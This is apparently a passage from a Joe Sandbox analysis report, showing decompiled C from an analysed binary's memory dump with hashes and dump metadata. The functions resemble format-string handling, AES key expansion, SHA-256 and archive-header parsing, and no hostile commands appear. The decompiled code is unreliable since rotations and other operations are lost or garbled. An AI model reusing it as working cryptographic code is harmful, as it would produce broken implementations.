                                                    0x00ce5254
                                                    0x00000000
                                                    0x00ce5254
                                                    0x00ce523d
                                                    0x00ce523d
                                                    0x00ce5240
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5243
                                                    0x00ce5246
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5248
                                                    0x00ce524b
                                                    0x00000000
                                                    0x00ce524b
                                                    0x00ce51fa
                                                    0x00ce5232
                                                    0x00000000
                                                    0x00ce5232
                                                    0x00ce51fe
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5207
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce520c
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce5211
                                                    0x00000000
                                                    0x00000000
                                                    0x00ce521a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a5e4164f116e6737245f2266134a339b4e36fc40a2ce9609730d42c2718a487
                                                    • Instruction ID: 5165a2e02f586c00ce4fff492c5b405c532668a075dd162694359eaf3e13a50b
                                                    • Opcode Fuzzy Hash: 3a5e4164f116e6737245f2266134a339b4e36fc40a2ce9609730d42c2718a487
                                                    • Instruction Fuzzy Hash: 4561CE75A00FC957CE389A6B58927BE2394EF0134CF14051AE763DF2D2D691DF429315
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E00CE4F9A(void* __ecx) {
                                                    				char _v6;
                                                    				char _v8;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				char _t49;
                                                    				signed int _t50;
                                                    				void* _t51;
                                                    				signed char _t54;
                                                    				signed char _t56;
                                                    				signed int _t57;
                                                    				signed int _t58;
                                                    				signed char _t67;
                                                    				signed char _t69;
                                                    				signed char _t71;
                                                    				signed char _t80;
                                                    				signed char _t82;
                                                    				signed int _t84;
                                                    				signed int _t86;
                                                    				signed int _t87;
                                                    				signed char _t92;
                                                    				void* _t95;
                                                    				intOrPtr _t100;
                                                    				unsigned int _t102;
                                                    				signed char _t104;
                                                    				void* _t112;
                                                    				unsigned int _t113;
                                                    				void* _t114;
                                                    				signed int _t115;
                                                    				signed int* _t116;
                                                    				void* _t119;
                                                    				void* _t121;
                                                    				void* _t122;
                                                    				void* _t124;
                                                    				void* _t125;
                                                    
                                                    				_push(__ecx);
                                                    				_t119 = __ecx;
                                                    				_t92 = 1;
                                                    				_t49 =  *((char*)(__ecx + 0x31));
                                                    				_t124 = _t49 - 0x64;
                                                    				if(_t124 > 0) {
                                                    					__eflags = _t49 - 0x70;
                                                    					if(__eflags > 0) {
                                                    						_t50 = _t49 - 0x73;
                                                    						__eflags = _t50;
                                                    						if(_t50 == 0) {
                                                    							L9:
                                                    							_t51 = E00CE5B88(_t119);
                                                    							L10:
                                                    							if(_t51 != 0) {
                                                    								__eflags =  *((char*)(_t119 + 0x30));
                                                    								if( *((char*)(_t119 + 0x30)) == 0) {
                                                    									_t113 =  *(_t119 + 0x20);
                                                    									_push(_t114);
                                                    									_v8 = 0;
                                                    									_t115 = 0;
                                                    									_v6 = 0;
                                                    									_t54 = _t113 >> 4;
                                                    									__eflags = _t92 & _t54;
                                                    									if((_t92 & _t54) == 0) {
                                                    										L46:
                                                    										_t100 =  *((intOrPtr*)(_t119 + 0x31));
                                                    										__eflags = _t100 - 0x78;
                                                    										if(_t100 == 0x78) {
                                                    											L48:
                                                    											_t56 = _t113 >> 5;
                                                    											__eflags = _t92 & _t56;
                                                    											if((_t92 & _t56) != 0) {
                                                    												L50:
                                                    												__eflags = _t100 - 0x61;
                                                    												if(_t100 == 0x61) {
                                                    													L53:
                                                    													_t57 = 1;
                                                    													L54:
                                                    													__eflags = _t92;
                                                    													if(_t92 != 0) {
                                                    														L56:
                                                    														 *((char*)(_t121 + _t115 - 4)) = 0x30;
                                                    														__eflags = _t100 - 0x58;
                                                    														if(_t100 == 0x58) {
                                                    															L59:
                                                    															_t58 = 1;
                                                    															L60:
                                                    															__eflags = _t58;
                                                    															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                                                    															_t115 = _t115 + 2;
                                                    															__eflags = _t115;
                                                    															L61:
                                                    															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
                                                    															__eflags = _t113 & 0x0000000c;
                                                    															if((_t113 & 0x0000000c) == 0) {
                                                    																E00CE4464(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
                                                    																_t122 = _t122 + 0x10;
                                                    															}
                                                    															E00CE5E83(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
                                                    															_t102 =  *(_t119 + 0x20);
                                                    															_t116 = _t119 + 0x18;
                                                    															_t67 = _t102 >> 3;
                                                    															__eflags = _t67 & 0x00000001;
                                                    															if((_t67 & 0x00000001) != 0) {
                                                    																_t104 = _t102 >> 2;
                                                    																__eflags = _t104 & 0x00000001;
                                                    																if((_t104 & 0x00000001) == 0) {
                                                    																	E00CE4464(_t119 + 0x448, 0x30, _t95, _t116);
                                                    																	_t122 = _t122 + 0x10;
                                                    																}
                                                    															}
                                                    															E00CE5D51(_t119, _t113, 0);
                                                    															__eflags =  *_t116;
                                                    															if( *_t116 >= 0) {
                                                    																_t71 =  *(_t119 + 0x20) >> 2;
                                                    																__eflags = _t71 & 0x00000001;
                                                    																if((_t71 & 0x00000001) != 0) {
                                                    																	E00CE4464(_t119 + 0x448, 0x20, _t95, _t116);
                                                    																}
                                                    															}
                                                    															_t69 = 1;
                                                    															L70:
                                                    															return _t69;
                                                    														}
                                                    														__eflags = _t100 - 0x41;
                                                    														if(_t100 == 0x41) {
                                                    															goto L59;
                                                    														}
                                                    														_t58 = 0;
                                                    														goto L60;
                                                    													}
                                                    													__eflags = _t57;
                                                    													if(_t57 == 0) {
                                                    														goto L61;
                                                    													}
                                                    													goto L56;
                                                    												}
                                                    												__eflags = _t100 - 0x41;
                                                    												if(_t100 == 0x41) {
                                                    													goto L53;
                                                    												}
                                                    												_t57 = 0;
                                                    												goto L54;
                                                    											}
                                                    											L49:
                                                    											_t92 = 0;
                                                    											__eflags = 0;
                                                    											goto L50;
                                                    										}
                                                    										__eflags = _t100 - 0x58;
                                                    										if(_t100 != 0x58) {
                                                    											goto L49;
                                                    										}
                                                    										goto L48;
                                                    									}
                                                    									_t80 = _t113 >> 6;
                                                    									__eflags = _t92 & _t80;
                                                    									if((_t92 & _t80) == 0) {
                                                    										__eflags = _t92 & _t113;
                                                    										if((_t92 & _t113) == 0) {
                                                    											_t82 = _t113 >> 1;
                                                    											__eflags = _t92 & _t82;
                                                    											if((_t92 & _t82) == 0) {
                                                    												goto L46;
                                                    											}
                                                    											_v8 = 0x20;
                                                    											L45:
                                                    											_t115 = _t92;
                                                    											goto L46;
                                                    										}
                                                    										_v8 = 0x2b;
                                                    										goto L45;
                                                    									}
                                                    									_v8 = 0x2d;
                                                    									goto L45;
                                                    								}
                                                    								_t69 = _t92;
                                                    								goto L70;
                                                    							}
                                                    							L11:
                                                    							_t69 = 0;
                                                    							goto L70;
                                                    						}
                                                    						_t84 = _t50;
                                                    						__eflags = _t84;
                                                    						if(__eflags == 0) {
                                                    							L28:
                                                    							_push(0);
                                                    							_push(0xa);
                                                    							L29:
                                                    							_t51 = E00CE5993(_t119, _t114, __eflags);
                                                    							goto L10;
                                                    						}
                                                    						__eflags = _t84 - 3;
                                                    						if(__eflags != 0) {
                                                    							goto L11;
                                                    						}
                                                    						_push(0);
                                                    						L13:
                                                    						_push(0x10);
                                                    						goto L29;
                                                    					}
                                                    					if(__eflags == 0) {
                                                    						_t51 = E00CE5B70(__ecx);
                                                    						goto L10;
                                                    					}
                                                    					__eflags = _t49 - 0x67;
                                                    					if(_t49 <= 0x67) {
                                                    						L30:
                                                    						_t51 = E00CE559F(_t92, _t119, _t112);
                                                    						goto L10;
                                                    					}
                                                    					__eflags = _t49 - 0x69;
                                                    					if(_t49 == 0x69) {
                                                    						L27:
                                                    						_t2 = _t119 + 0x20;
                                                    						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
                                                    						__eflags =  *_t2;
                                                    						goto L28;
                                                    					}
                                                    					__eflags = _t49 - 0x6e;
                                                    					if(_t49 == 0x6e) {
                                                    						_t51 = E00CE5ADD(__ecx, _t112);
                                                    						goto L10;
                                                    					}
                                                    					__eflags = _t49 - 0x6f;
                                                    					if(_t49 != 0x6f) {
                                                    						goto L11;
                                                    					}
                                                    					_t51 = E00CE5B51(__ecx);
                                                    					goto L10;
                                                    				}
                                                    				if(_t124 == 0) {
                                                    					goto L27;
                                                    				}
                                                    				_t125 = _t49 - 0x58;
                                                    				if(_t125 > 0) {
                                                    					_t86 = _t49 - 0x5a;
                                                    					__eflags = _t86;
                                                    					if(_t86 == 0) {
                                                    						_t51 = E00CE54D9(__ecx);
                                                    						goto L10;
                                                    					}
                                                    					_t87 = _t86 - 7;
                                                    					__eflags = _t87;
                                                    					if(_t87 == 0) {
                                                    						goto L30;
                                                    					}
                                                    					__eflags = _t87;
                                                    					if(__eflags != 0) {
                                                    						goto L11;
                                                    					}
                                                    					L17:
                                                    					_t51 = E00CE586B(_t92, _t119, __eflags, 0);
                                                    					goto L10;
                                                    				}
                                                    				if(_t125 == 0) {
                                                    					_push(1);
                                                    					goto L13;
                                                    				}
                                                    				if(_t49 == 0x41) {
                                                    					goto L30;
                                                    				}
                                                    				if(_t49 == 0x43) {
                                                    					goto L17;
                                                    				}
                                                    				if(_t49 <= 0x44) {
                                                    					goto L11;
                                                    				}
                                                    				if(_t49 <= 0x47) {
                                                    					goto L30;
                                                    				}
                                                    				if(_t49 != 0x53) {
                                                    					goto L11;
                                                    				}
                                                    				goto L9;
                                                    			}

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                    • Instruction ID: 720fbb2404c505c779ef9bcbd4913ef5a22e2bcc6c05a53a434c4f4322c7446c
                                                    • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                    • Instruction Fuzzy Hash: DE514771600FC857DF3889AB8556FBF63C59B0270CF180919F8A3DB282C615EF4593A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 97%
                                                    			E00CCEFE2(intOrPtr __ecx, char _a4) {
                                                    				char _v12;
                                                    				signed int _v13;
                                                    				signed int _v14;
                                                    				signed int _v15;
                                                    				signed int _v16;
                                                    				signed char _v17;
                                                    				signed char _v18;
                                                    				signed char _v19;
                                                    				signed char _v20;
                                                    				char _v28;
                                                    				signed int _v29;
                                                    				signed int _v30;
                                                    				signed int _v31;
                                                    				signed int _v32;
                                                    				signed int* _v36;
                                                    				signed int _v40;
                                                    				char _v44;
                                                    				intOrPtr _v48;
                                                    				signed int _t94;
                                                    				signed int _t113;
                                                    				signed int _t116;
                                                    				signed int _t117;
                                                    				signed char _t120;
                                                    				signed int* _t121;
                                                    				signed int* _t122;
                                                    				signed int _t123;
                                                    				signed int* _t124;
                                                    				signed int _t125;
                                                    				signed int _t126;
                                                    				signed int _t127;
                                                    				signed int* _t128;
                                                    				void* _t130;
                                                    				signed int _t131;
                                                    				void* _t132;
                                                    				signed int _t134;
                                                    				signed int* _t139;
                                                    				signed int* _t142;
                                                    				void* _t145;
                                                    				void* _t167;
                                                    
                                                    				_t134 = _a4 - 6;
                                                    				_v48 = __ecx;
                                                    				_v40 = _t134;
                                                    				_t94 = E00CE0320( &_v32, _a4, 0x20);
                                                    				_t145 =  &_v48 + 0xc;
                                                    				_t117 = 0;
                                                    				_t126 = 0;
                                                    				_t127 = 0;
                                                    				if(_t134 <= 0) {
                                                    					L10:
                                                    					if(_t117 <= _a4) {
                                                    						_t128 = 0xcfe198;
                                                    						do {
                                                    							_t120 = _v32 ^  *(( *(_t145 + 0x1d + _t134 * 4) & 0x000000ff) + 0xcfe098);
                                                    							_v32 = _t120;
                                                    							_v31 = _v31 ^  *(( *(_t145 + 0x1e + _t134 * 4) & 0x000000ff) + 0xcfe098);
                                                    							_v30 = _v30 ^  *(( *(_t145 + 0x1f + _t134 * 4) & 0x000000ff) + 0xcfe098);
                                                    							_v29 = _v29 ^  *(( *(_t145 + 0x1c + _t134 * 4) & 0x000000ff) + 0xcfe098);
                                                    							_t94 =  *_t128 ^ _t120;
                                                    							_v32 = _t94;
                                                    							_v36 =  &(_t128[0]);
                                                    							if(_t134 == 8) {
                                                    								_t121 =  &_v28;
                                                    								_v44 = 3;
                                                    								do {
                                                    									_t130 = 4;
                                                    									do {
                                                    										 *_t121 =  *_t121 ^  *(_t121 - 4);
                                                    										_t121 =  &(_t121[0]);
                                                    										_t130 = _t130 - 1;
                                                    									} while (_t130 != 0);
                                                    									_t55 =  &_v44;
                                                    									 *_t55 = _v44 - 1;
                                                    								} while ( *_t55 != 0);
                                                    								_t122 =  &_v12;
                                                    								_v44 = 3;
                                                    								_v16 = _v16 ^  *((_v20 & 0x000000ff) + 0xcfe098);
                                                    								_v15 = _v15 ^  *((_v19 & 0x000000ff) + 0xcfe098);
                                                    								_v14 = _v14 ^  *((_v18 & 0x000000ff) + 0xcfe098);
                                                    								_v13 = _v13 ^  *((_v17 & 0x000000ff) + 0xcfe098);
                                                    								do {
                                                    									_t131 = 4;
                                                    									do {
                                                    										_t94 =  *((intOrPtr*)(_t122 - 4));
                                                    										 *_t122 =  *_t122 ^ _t94;
                                                    										_t122 =  &(_t122[0]);
                                                    										_t131 = _t131 - 1;
                                                    									} while (_t131 != 0);
                                                    									_t76 =  &_v44;
                                                    									 *_t76 = _v44 - 1;
                                                    								} while ( *_t76 != 0);
                                                    								goto L28;
                                                    							} else {
                                                    								if(_t134 > 1) {
                                                    									_t124 =  &_v28;
                                                    									_v44 = _t134 - 1;
                                                    									do {
                                                    										_t132 = 4;
                                                    										do {
                                                    											_t94 =  *((intOrPtr*)(_t124 - 4));
                                                    											 *_t124 =  *_t124 ^ _t94;
                                                    											_t124 =  &(_t124[0]);
                                                    											_t132 = _t132 - 1;
                                                    										} while (_t132 != 0);
                                                    										_t50 =  &_v44;
                                                    										 *_t50 = _v44 - 1;
                                                    									} while ( *_t50 != 0);
                                                    								}
                                                    								_t131 = 0;
                                                    								if(_t134 <= 0) {
                                                    									L37:
                                                    									_t167 = _t117 - _a4;
                                                    								} else {
                                                    									L28:
                                                    									while(_t117 <= _a4) {
                                                    										if(_t131 < _t134) {
                                                    											_t139 =  &(( &_v32)[_t131]);
                                                    											while(_t126 < 4) {
                                                    												_t123 = _t126 + _t117 * 4;
                                                    												_t113 =  *_t139;
                                                    												_t131 = _t131 + 1;
                                                    												_t139 =  &_a4;
                                                    												_t126 = _t126 + 1;
                                                    												 *(_v48 + 0x18 + _t123 * 4) = _t113;
                                                    												_t134 = _v40;
                                                    												if(_t131 < _t134) {
                                                    													continue;
                                                    												}
                                                    												break;
                                                    											}
                                                    										}
                                                    										if(_t126 == 4) {
                                                    											_t117 = _t117 + 1;
                                                    										}
                                                    										_t90 = _t126 - 4; // -4
                                                    										_t94 =  ~_t90;
                                                    										asm("sbb eax, eax");
                                                    										_t126 = _t126 & _t94;
                                                    										if(_t131 < _t134) {
                                                    											continue;
                                                    										} else {
                                                    											goto L37;
                                                    										}
                                                    										goto L38;
                                                    									}
                                                    								}
                                                    							}
                                                    							L38:
                                                    							_t128 = _v36;
                                                    						} while (_t167 <= 0);
                                                    					}
                                                    				} else {
                                                    					while(_t117 <= _a4) {
                                                    						if(_t127 < _t134) {
                                                    							_t142 =  &(( &_v32)[_t127]);
                                                    							while(_t126 < 4) {
                                                    								_t125 = _t126 + _t117 * 4;
                                                    								_t116 =  *_t142;
                                                    								_t127 = _t127 + 1;
                                                    								_t142 =  &_a4;
                                                    								_t126 = _t126 + 1;
                                                    								 *(_v48 + 0x18 + _t125 * 4) = _t116;
                                                    								_t134 = _v40;
                                                    								if(_t127 < _t134) {
                                                    									continue;
                                                    								}
                                                    								break;
                                                    							}
                                                    						}
                                                    						if(_t126 == 4) {
                                                    							_t117 = _t117 + 1;
                                                    						}
                                                    						_t18 = _t126 - 4; // -4
                                                    						_t94 =  ~_t18;
                                                    						asm("sbb eax, eax");
                                                    						_t126 = _t126 & _t94;
                                                    						if(_t127 < _t134) {
                                                    							continue;
                                                    						} else {
                                                    							goto L10;
                                                    						}
                                                    						goto L39;
                                                    					}
                                                    				}
                                                    				L39:
                                                    				return _t94;
                                                    			}











































                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9bf59200e99960125268c950917f9087bc38e3497dded4f12d8c47410a6ea48c
                                                    • Instruction ID: cbd4fcb8d72f10f3037188f29dcffc4ef13c216df833b8a843ac56a5aa4b8320
                                                    • Opcode Fuzzy Hash: 9bf59200e99960125268c950917f9087bc38e3497dded4f12d8c47410a6ea48c
                                                    • Instruction Fuzzy Hash: B651D3715083D58FD712CF24C18096EBFE2AE9A714F4909ADE4E95B243C231DB4BDB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E00CD00B7() {
                                                    				signed int _t81;
                                                    				signed int _t96;
                                                    				signed int _t98;
                                                    				signed int* _t99;
                                                    				unsigned int* _t100;
                                                    				void* _t101;
                                                    				unsigned int _t103;
                                                    				signed int _t108;
                                                    				unsigned int _t122;
                                                    				signed int _t124;
                                                    				signed int _t125;
                                                    				signed int* _t130;
                                                    				signed int _t131;
                                                    				signed int* _t132;
                                                    				signed int _t133;
                                                    				signed int _t140;
                                                    				void* _t146;
                                                    				void* _t147;
                                                    				void* _t148;
                                                    				signed int _t149;
                                                    				void* _t151;
                                                    
                                                    				_t130 =  *(_t151 + 0x148);
                                                    				_t133 = 0;
                                                    				_t99 =  &(_t130[0xa]);
                                                    				do {
                                                    					 *((intOrPtr*)(_t151 + 0x48 + _t133 * 4)) = E00CE68E4( *_t99);
                                                    					_t99 =  &(_t99[1]);
                                                    					_t133 = _t133 + 1;
                                                    				} while (_t133 < 0x10);
                                                    				_t100 = _t151 + 0x80;
                                                    				_t148 = 0x30;
                                                    				do {
                                                    					_t103 =  *(_t100 - 0x34);
                                                    					_t122 =  *_t100;
                                                    					asm("rol esi, 0xe");
                                                    					_t100 =  &(_t100[1]);
                                                    					asm("ror eax, 0x7");
                                                    					asm("rol eax, 0xd");
                                                    					asm("rol ecx, 0xf");
                                                    					_t100[1] = (_t103 ^ _t103 ^ _t103 >> 0x00000003) + (_t122 ^ _t122 ^ _t122 >> 0x0000000a) +  *((intOrPtr*)(_t100 - 0x3c)) +  *((intOrPtr*)(_t100 - 0x18));
                                                    					_t148 = _t148 - 1;
                                                    				} while (_t148 != 0);
                                                    				_t81 =  *_t130;
                                                    				_t101 = 0;
                                                    				_t108 = _t130[1];
                                                    				_t124 = _t130[2];
                                                    				_t140 = _t130[5];
                                                    				_t149 = _t130[4];
                                                    				 *(_t151 + 0x20) = _t81;
                                                    				 *(_t151 + 0x2c) = _t81;
                                                    				 *(_t151 + 0x28) = _t130[3];
                                                    				 *(_t151 + 0x10) = _t130[6];
                                                    				_t131 =  *(_t151 + 0x20);
                                                    				 *(_t151 + 0x14) = _t108;
                                                    				 *(_t151 + 0x18) = _t124;
                                                    				 *(_t151 + 0x1c) = _t140;
                                                    				 *(_t151 + 0x24) = _t130[7];
                                                    				do {
                                                    					 *(_t151 + 0x40) =  *(_t151 + 0x10);
                                                    					asm("rol eax, 0x7");
                                                    					 *(_t151 + 0x3c) = _t140;
                                                    					asm("ror esi, 0xb");
                                                    					 *(_t151 + 0x30) = _t108;
                                                    					 *(_t151 + 0x34) = _t124;
                                                    					_t125 =  *(_t151 + 0x1c);
                                                    					asm("ror eax, 0x6");
                                                    					 *(_t151 + 0x1c) = _t149;
                                                    					 *(_t151 + 0x38) = _t149;
                                                    					_t40 = _t101 + 0xcf3b28; // 0x428a2f98
                                                    					_t146 = (_t149 ^ _t149 ^ _t149) + ( !_t149 &  *(_t151 + 0x10) ^ _t125 & _t149) +  *_t40 +  *((intOrPtr*)(_t151 + _t101 + 0x44));
                                                    					_t101 = _t101 + 4;
                                                    					_t147 = _t146 +  *(_t151 + 0x24);
                                                    					 *(_t151 + 0x24) =  *(_t151 + 0x10);
                                                    					_t149 =  *(_t151 + 0x28) + _t147;
                                                    					 *(_t151 + 0x10) = _t125;
                                                    					asm("rol eax, 0xa");
                                                    					asm("ror edx, 0xd");
                                                    					 *(_t151 + 0x20) = _t131;
                                                    					asm("ror eax, 0x2");
                                                    					 *(_t151 + 0x28) =  *(_t151 + 0x18);
                                                    					_t96 =  *(_t151 + 0x14);
                                                    					_t108 = _t131;
                                                    					 *(_t151 + 0x18) = _t96;
                                                    					 *(_t151 + 0x14) = _t108;
                                                    					_t131 = (_t131 ^ _t131 ^ _t131) + (( *(_t151 + 0x18) ^  *(_t151 + 0x14)) & _t131 ^  *(_t151 + 0x18) &  *(_t151 + 0x14)) + _t147;
                                                    					_t140 =  *(_t151 + 0x1c);
                                                    					_t124 = _t96;
                                                    				} while (_t101 < 0x100);
                                                    				_t98 =  *(_t151 + 0x2c) + _t131;
                                                    				_t132 =  *(_t151 + 0x148);
                                                    				_t132[1] = _t132[1] + _t108;
                                                    				_t132[2] = _t132[2] +  *(_t151 + 0x30);
                                                    				_t132[3] = _t132[3] +  *(_t151 + 0x34);
                                                    				_t132[5] = _t132[5] +  *(_t151 + 0x38);
                                                    				_t132[6] = _t132[6] +  *(_t151 + 0x3c);
                                                    				_t132[4] = _t132[4] + _t149;
                                                    				_t132[7] = _t132[7] +  *(_t151 + 0x40);
                                                    				 *_t132 = _t98;
                                                    				return _t98;
                                                    			}

























                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1e3ba205f6b5493a7f5c70399d4233292b3cd57955f9dc0524b3faab8f1ff9ca
                                                    • Instruction ID: 94482213c493999be2c0142c345e7507de57e993577bd0e967719f7bd64c6981
                                                    • Opcode Fuzzy Hash: 1e3ba205f6b5493a7f5c70399d4233292b3cd57955f9dc0524b3faab8f1ff9ca
                                                    • Instruction Fuzzy Hash: DF51E2B1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3340D734E959CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CD3E0B(unsigned int __ecx) {
                                                    				intOrPtr _t39;
                                                    				signed int _t47;
                                                    				intOrPtr _t48;
                                                    				signed int _t55;
                                                    				signed int _t61;
                                                    				signed int _t66;
                                                    				intOrPtr _t78;
                                                    				signed int _t82;
                                                    				unsigned char _t84;
                                                    				signed int* _t86;
                                                    				intOrPtr _t87;
                                                    				unsigned int _t88;
                                                    				unsigned int _t89;
                                                    				signed int _t90;
                                                    				void* _t91;
                                                    
                                                    				_t88 =  *(_t91 + 0x20);
                                                    				_t61 = 0;
                                                    				_t86 =  *(_t91 + 0x28);
                                                    				_t89 = __ecx;
                                                    				 *(_t91 + 0x18) = __ecx;
                                                    				_t86[3] = 0;
                                                    				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E00CD4E52(__ecx) != 0) {
                                                    					E00CCA881(_t88,  ~( *(_t88 + 4)) & 0x00000007);
                                                    					 *(_t91 + 0x18) = E00CCA898(_t88) >> 8;
                                                    					E00CCA881(_t88, 8);
                                                    					_t66 =  *(_t91 + 0x14) & 0x000000ff;
                                                    					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
                                                    					 *((intOrPtr*)(_t91 + 0x10)) = _t39;
                                                    					if(_t39 == 4) {
                                                    						goto L12;
                                                    					}
                                                    					_t86[3] = _t39 + 2;
                                                    					_t86[1] = (_t66 & 0x00000007) + 1;
                                                    					 *(_t91 + 0x20) = E00CCA898(_t88) >> 8;
                                                    					E00CCA881(_t88, 8);
                                                    					if( *((intOrPtr*)(_t91 + 0x10)) <= _t61) {
                                                    						L8:
                                                    						_t84 =  *(_t91 + 0x14);
                                                    						 *_t86 = _t61;
                                                    						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x1c))) {
                                                    							goto L12;
                                                    						}
                                                    						_t47 =  *_t88;
                                                    						_t86[2] = _t47;
                                                    						_t23 = _t47 - 1; // -1
                                                    						_t48 =  *((intOrPtr*)(_t89 + 0x88));
                                                    						_t78 = _t23 + _t61;
                                                    						if(_t48 >= _t78) {
                                                    							_t48 = _t78;
                                                    						}
                                                    						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
                                                    						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
                                                    						_t86[4] = _t84 >> 7;
                                                    						return 1;
                                                    					}
                                                    					_t87 =  *((intOrPtr*)(_t91 + 0x10));
                                                    					_t90 = _t61;
                                                    					do {
                                                    						_t55 = E00CCA898(_t88) >> 8 << _t90;
                                                    						_t90 = _t90 + 8;
                                                    						_t61 = _t61 + _t55;
                                                    						_t82 =  *(_t88 + 4) + 8;
                                                    						 *_t88 =  *_t88 + (_t82 >> 3);
                                                    						 *(_t88 + 4) = _t82 & 0x00000007;
                                                    						_t87 = _t87 - 1;
                                                    					} while (_t87 != 0);
                                                    					_t86 =  *(_t91 + 0x28);
                                                    					_t89 =  *(_t91 + 0x18);
                                                    					goto L8;
                                                    				} else {
                                                    					L12:
                                                    					return 0;
                                                    				}
                                                    			}


                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
